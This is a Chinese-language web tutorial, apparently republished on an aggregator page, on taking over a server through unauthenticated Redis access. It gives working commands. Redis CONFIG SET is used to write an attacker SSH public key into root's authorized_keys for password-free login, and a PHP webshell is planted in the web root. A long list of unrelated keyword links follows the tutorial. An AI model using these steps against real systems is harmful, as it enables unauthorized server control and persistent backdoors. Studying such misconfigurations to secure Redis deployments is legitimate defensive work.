Redis未授权访问导致服务器被控制
发表于:2024-11-28 作者:千家信息网编辑
千家信息网最后更新 2024年11月28日,通过使用nmap扫描,发现某一端口对应的服务为Redis,然后我们可以尝试看看是否是未授权访问!首先使用下列命令安装Redis tools:root@kali:~# apt-get install r
千家信息网最后更新 2024年11月28日Redis未授权访问导致服务器被控制
通过使用nmap扫描,发现某一端口对应的服务为Redis,然后我们可以尝试看看是否是未授权访问!
首先使用下列命令安装Redis tools:
root@kali:~# apt-get install redis-tools
然后通过下列命令看是否是未授权访问:
root@kali:~# redis-cli -h 10.198.131.110.198.131.1:6379>
然后我们可以使用免密登录的方式进行相关***:
生成公钥:
root@lsy:~/.ssh# ssh-keygen -t rsaroot@lsy:~/.ssh# cat id_rsa.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn root@lsyroot@lsy:~/.ssh#
将公钥写入远程服务器:
root@lsy:~/.ssh# redis-cli -h 10.198.131.110.198.131.1:6379> CONFIG SET dir /root/.ssh/OK10.198.131.1:6379> CONFIG SET dbfilename authorized_keysOK10.198.131.1:6379> set xxxx "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn root@lsy\n\n\n"OK10.198.131.1:6379> saveOK10.198.131.1:6379> exit
使用ssh远程登录:
root@lsy:~/.ssh# ssh 10.198.131.1
免密登录成功:
上传webshell
#redis-cli -h 192.168.2.5 -p 6379192.168.2.5:6379>config set dir /var/wwww/html192.168.2.5:6379>config set dbfilename 1.php192.168.2.5:6379>set webshell ""192.168.2.5:6379>save
登录
服务
公钥
命令
服务器
成功
方式
端口
尝试
生成
控制
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
微信聊天记录 数据库
数据库窗体的思维导图
数据库事务覆盖怎么找回来
vb怎么查找数据库中文
浙江计算机应用软件开发服务费
网络安全宣传照周总结
网络安全自身安全
怎么在云服务器上安装java
嵌入式软件开发考研方向
新罗区字沐雪网络技术工作室
做好网络安全的意见建议
加强各市网络安全管理
ens数据库
糖小果网络技术有限公司
网络安全知识培训背景
乌鲁木齐深圳网络安全培训
一个关系型数据库管理系统应具备
股票配资软件开发彭
xp配置ftp服务器配置
怎样查服务器功率
永劫无间不同服务器能传火吗
画出网络安全模型的基本框图
怎么在云服务器上安装java
软件开发信息技术公司
滨海新区网络安全知识
网络技术岗位薪资
网络服务器的硬件有哪些
山海经怎么获取服务器卡
易语言 服务器时间
腾讯cvm服务器流量